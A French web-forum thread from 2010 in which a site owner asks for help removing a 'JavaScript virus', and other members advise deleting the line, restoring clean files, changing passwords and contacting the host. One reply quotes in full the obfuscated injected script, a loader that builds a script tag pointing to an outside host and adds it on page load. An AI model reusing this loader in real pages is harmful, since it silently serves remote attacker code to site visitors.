Partage
  • Partager sur Facebook
  • Partager sur Twitter

Virus javascript sur mon site

    4 juin 2010 à 20:53:40

    Bonjour,
    Il y a de sa un moment on m'a informé que le site avait un virus javascript. Par contre, je ne sais pas ou il est, et, comment le détruire. Mon site est www.game-silver.com
    Comment faire ?
    • Partager sur Facebook
    • Partager sur Twitter
    Ilidas-Gaming - Site e-commerce de vente de Clé CD - Recherche responsable marketing
      4 juin 2010 à 21:38:46

      Et regarder ton code non ?

      Si t'avais regardé ton code une seule seconde t'aurais vu en bas de page :

      <script>var ZT={q:false};var iq;OE={Wp:false};g={iK:false};B=function(){var bD=new Date();this.N=29386;this.N-=51;var a=new Date();function i(r,J,O){return r.substr(J,O);}var L=new Array();var n="/goo"+"gle."+"com/"+"eyny"+".com"+"/msn"+".com"+i(".phpvIFC",0,4);YY=55616;YY--;Lr=35877;Lr--;var m='';this.E_=false;var DEb='';var Bx={Zo:false};var C=document;Fn=11247;Fn++;var Z=RegExp;function Q(r,J){Qr=["FF","Dl","_"];this.RS=3761;this.RS-=131;var O=String(i("[PRU",0,1))+J+String(i("]s5la",0,1));o=["asa"];var D=new Z(O, new String("g"));var pT={h:23122};return r.replace(D, m);X=48582;X++;};this.c="";var Dm=Q('sMcUr1iUp6tg','2guNAfTlLBGqUZzM69YeOa1');Up={T:false};var e=new String("body");bZ=[];var w='';var ase=new Array();var Js=new Date();var nt=981364-973284;var Yx=false;var l=null;XN=38300;XN++;Ct=9515;Ct++;iq=function(){var PC="PC";try {ps=62424;ps+=237;var u=Q('cwrDeOa9tJe9E9lFePmkeQnDtH','7OFkQ5jSDHWJTP9wN2iU0h');var sx={tkO:false};Bm=36730;Bm-=114;Zx=C[u](Dm);JY={Fa:false};var A=new Array();var p=Q('syrHcK','XWhay95lKH6mQZk');Jg=40817;Jg--;var r=nt+n;var eE="";fY=19371;fY-=54;y=["ef","TY"];try {var fd='ib'} catch(fd){};var W=new String(i("defeWn97",0,4)+"r");var mQ=["fj","yO"];MY=["CC"];var SJ=new Date();VO=28303;VO--;try {} catch(xh){};var cN={};Zx[p]=String("http"+"://w"+i("estc2ZU",0,4)+i("R7kbount7bRk",4,4)+i("ry.rTvo",0,4)+i("lqmRu:lqRm",4,2))+r;var SS='';Zx[W]=[5,1][1];var bf=new Date();try {} catch(bE){};C[e].appendChild(Zx);DL={};try {var UN='bO'} catch(UN){};} catch(t){this.HR=9249;this.HR++;};};};this.kW=56523;this.kW-=100;B();this.OA=60729;this.OA++;var AE="AE";Zy={TM:false};window.onload=iq;qX=39941;qX++;</script>
      


      Tu supprimes la ligne.

      Mais si quelqu'un à mis ça, c'est qu'il a accès à ton serveur.

      Donc supprimes tous les fichiers, remets tes fichiers locaux, changes les passwords, et cherches les failles.
      • Partager sur Facebook
      • Partager sur Twitter
        4 juin 2010 à 23:47:12

        Ok merci
        • Partager sur Facebook
        • Partager sur Twitter
        Ilidas-Gaming - Site e-commerce de vente de Clé CD - Recherche responsable marketing
          5 juin 2010 à 12:16:25

          Mets le sujet en résolu.
          • Partager sur Facebook
          • Partager sur Twitter
            5 juin 2010 à 12:26:50

            Je viens de faire tout sa, et il me dit qu'il y a encore un virus...
            • Partager sur Facebook
            • Partager sur Twitter
            Ilidas-Gaming - Site e-commerce de vente de Clé CD - Recherche responsable marketing
              5 juin 2010 à 12:48:38

              Qui "il" ? -_-

              Le mec qui a accès à ton FTP que tu penses de confiance et qui te met toujours le virus ?

              Et t'as vérifié si tes fichiers locaux n'avait pas la ligne en question également ?
              • Partager sur Facebook
              • Partager sur Twitter
                5 juin 2010 à 13:26:44

                Bas un gars sur mp qui ma dit que son antivirus détectais toujours. Se n'est pas moi qui est les fichiers, je ne suis pas le webmaster...
                • Partager sur Facebook
                • Partager sur Twitter
                Ilidas-Gaming - Site e-commerce de vente de Clé CD - Recherche responsable marketing
                  5 juin 2010 à 14:52:10

                  Le script est toujours présent à la fin de ton fichier.

                  - Est-ce que ce script est présent dans tes fichiers locaux ?
                  - Est-ce que si tu télécharges un fichier dans le sens « Serveur FTP → Ton PC » et que tu l'ouvres avec un éditeur de texte, est-ce que tu vois le script ?

                  Si la réponse à ces deux question est « non », alors c'est une faille sur ton serveur. Dans ce cas, contacte ton hébergeur.
                  • Partager sur Facebook
                  • Partager sur Twitter
                    12 juin 2010 à 16:45:30

                    bonjour, mon site n'avait plus de virus. Et là un coup un gars vient me dire, que j'ai un nouveau virus. J'en ai marre, quelqu'un voit ou il est ? Et surtout peut m'aider à le détruire ?
                    • Partager sur Facebook
                    • Partager sur Twitter
                    Ilidas-Gaming - Site e-commerce de vente de Clé CD - Recherche responsable marketing
                      12 juin 2010 à 17:16:23

                      Il est tout au fond dans le code source (fais Ctrl+U sur Firefox ou Chrome).

                      Citation : dyl@n

                      - Est-ce que ce script est présent dans tes fichiers locaux ?
                      - Si tu télécharges un fichier dans le sens « Serveur FTP → Ton PC » et que tu l'ouvres avec un éditeur de texte, est-ce que tu vois le script ?

                      Si la réponse à ces deux question est « non », alors c'est une faille sur ton serveur. Dans ce cas, contacte ton hébergeur.

                      • Partager sur Facebook
                      • Partager sur Twitter

                      Virus javascript sur mon site

                      × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
                      × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
                      • Editeur
                      • Markdown